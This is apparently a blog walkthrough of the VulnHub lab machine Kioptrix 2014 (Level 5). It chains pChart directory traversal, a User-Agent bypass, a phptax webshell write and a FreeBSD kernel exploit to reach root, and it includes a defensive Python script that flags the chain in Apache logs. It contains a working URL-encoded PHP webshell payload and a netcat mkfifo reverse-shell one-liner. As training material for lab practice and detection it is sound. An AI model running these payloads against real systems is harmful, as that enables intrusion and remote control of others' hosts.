Kioptrix Level 5 — VulnHub

Abdul Wassay (aka HotPlugin)
Jan 22, 2022


https://www.vulnhub.com/entry/kioptrix-2014-5,62/

Introduction:

Hello everyone. In this post, I'll be sharing my walkthrough for Kioptrix Level 5, the last box in the Kioptrix series on VulnHub. It was an easy box. We gain a foothold through directory traversal and RCE, then get root via a kernel exploit. Let's start.

Enumeration:

Starting off with an nmap scan, we find two open ports: 80 and 8080.

Browsing to the web server on port 80, we get a page saying it works.

Browsing to the web proxy on port 8080, we get a 403 (Forbidden) response.

Looking at the page source on port 80, we find a URL path in an HTML comment.

Searching for vulnerabilities in pChart 2.1.3, we find a directory traversal PoC on Exploit-DB.

https://www.exploit-db.com/exploits/31173

Using the above PoC, I started fuzzing for configuration files with the LFI Linux wordlist from SecLists.

We get some sensitive files, but nothing in them was useful for a foothold. So I started looking for the web server's config file. We know the web server is Apache and the OS is FreeBSD, so I searched the FreeBSD documentation and found the server config path.

https://docs.freebsd.org/en/books/handbook/network-servers/#network-apache

Looking at the config file, we see why it's refusing us access to the page: it's the User-Agent. The config only allows user agents that start with Mozilla/4.0 and denies requests from every other user agent.

So I went to the proxy options in Burp Suite, added a new match-and-replace setting to swap Mozilla/5.0 for 4.0 in every request, and successfully reached the forbidden page on 8080.

Foothold:

Searching for the application on 8080, phptax, we find that it is a free program for calculating US income taxes and that it is vulnerable to RCE. I found an exploit on Exploit-DB. All it did was write a PHP webshell to the server through the field and newvalue HTTP GET parameters.

So I did the same manually and got RCE.

http://IP:8080/phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E

http://IP:8080/phptax/data/rce.php?cmd=id

Then, using a reverse shell payload from the PayloadsAllTheThings repo, I successfully got a shell on the machine.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
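From the defender's side, the chain above (traversal through pChart, a .php file written via phptax's field/newvalue parameters, then its execution from phptax/data/) leaves a clear trail in the Apache access log. The following Python script is an added example, not part of this write-up or of any tool it mentions: it parses combined-format log lines, fully URL-decodes every parameter, and tags each of those three steps. The sample log lines and the /pChart2.1.3/examples/ path are constructed for the demo.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" access-log format (the layout httpd writes by default).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')

# Constructed sample lines replaying this write-up's chain: traversal through pChart,
# a .php file written via phptax's field/newvalue parameters, then its execution.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Jan/2022:10:00:01 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 2711 "-" "Mozilla/4.0"
10.0.0.5 - - [22/Jan/2022:10:00:09 +0000] "GET /phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E HTTP/1.1" 200 512 "-" "Mozilla/4.0"
10.0.0.5 - - [22/Jan/2022:10:00:12 +0000] "GET /phptax/data/rce.php?cmd=id HTTP/1.1" 200 60 "-" "Mozilla/4.0"
10.0.0.9 - - [22/Jan/2022:10:01:00 +0000] "GET /phptax/index.php?field=income&newvalue=40000 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding so ..%2f and %252e%252e are both caught."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(line):
    """Return the alert tags for one access-log line (empty list if benign)."""
    m = LOG_RE.match(line)
    if not m: return ["unparsable"]
    url = urlsplit(m.group("url"))
    path = decode_fully(url.path)
    params = {k: decode_fully(v) for k, v in parse_qsl(url.query, keep_blank_values=True)}
    alerts = []
    # 1. Directory traversal: any decoded parameter walking upward with ../ or ..\
    if any(re.search(r"\.\.[\\/]", v) for v in params.values()):
        alerts.append("traversal")
    # 2. phptax arbitrary write: 'field' names a .php file or 'newvalue' carries PHP tags
    field, newvalue = params.get("field", ""), params.get("newvalue", "")
    if path.endswith("/phptax/index.php") and (field.lower().endswith(".php") or "<?" in newvalue):
        alerts.append("phptax-webshell-write")
    # 3. A .php file executed from phptax/data/, a directory meant to hold data only
    if "/phptax/data/" in path and path.endswith(".php"):
        alerts.append("phptax-data-exec")
    return alerts

def scan(log_text):
    """Group alerts by client IP so a traversal -> write -> exec chain stands out."""
    hits = {}
    for line in log_text.splitlines():
        for tag in classify(line):
            hits.setdefault(line.split(" ", 1)[0], []).append(tag)  # first token is the client IP
    return hits
```

Running scan() over a real access log and alerting when one IP collects more than one tag is the point: a single traversal hit is noise, a traversal followed by a write into phptax/data/ and a request for that file is the full foothold.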

Privilege Escalation:

Enumerating the machine, we find it doesn't have Python, so I couldn't stabilize my shell. There wasn't anything particularly useful in the file system, so I looked at the kernel version. It was FreeBSD 9.0 RELEASE.

Searching for a potential kernel exploit, I found one. Since the box had neither curl nor wget, I used netcat to transfer the exploit to the box.

Compiling and running the exploit, we successfully get root.

Thanks.
